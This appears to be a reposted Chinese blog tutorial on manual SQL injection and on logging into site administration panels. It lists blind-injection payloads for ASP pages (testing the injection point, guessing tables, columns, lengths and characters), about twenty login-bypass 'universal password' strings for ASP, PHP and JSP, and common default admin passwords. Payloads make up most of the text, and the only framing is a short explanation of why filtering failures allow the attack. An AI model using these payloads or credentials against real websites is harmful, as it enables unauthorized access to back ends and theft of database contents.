SQL手工注入原理&&万能密码及默认密码登陆后台

SQL手工注入原理:

下面就是比较笨的方法了==    一个一个试 (* ̄rǒ ̄)

针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点

一、什么是SQL注入
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

二、判定是否存在注入点
 and 1=1  and 1=2

三、猜解数据库表名
 and 0<>(select count(*) from 表名)

四、猜解数据库列名
 and (select count(列名) from 猜到的表名)>0

五、猜解字段长度
 and (select top 1 len(猜到的列名) from 猜到的表名)>0

六、猜解字符内容
 and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')

万能密码及默认密码登陆后台:

一、万能密码原理
万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。
例如后台系统验证密码要求用户输入的密码和数据库里面的匹配,而用万能密码的方式,就是将验证的语句改成了验证成功的,逻辑运算符AND和OR的运算优先次序是:先运算AND运算符在运算OR运算符,这个漏洞是发生在登陆口,只有登陆口才会出现这样的漏洞。

二、万能密码大全
ASP 万能密码

1:"or "a"="a

2:')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1

17: admin' or 'a'='a 密码随便

PHP 万能密码

1:'or 1=1/*


2:User: something

   Pass: ' or '1'='1


JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*

默认密码:

1:admin

2:admin888

3:123456

4:123123

5:(域名)

猜你喜欢

转载自blog.csdn.net/xlh006/article/details/82670776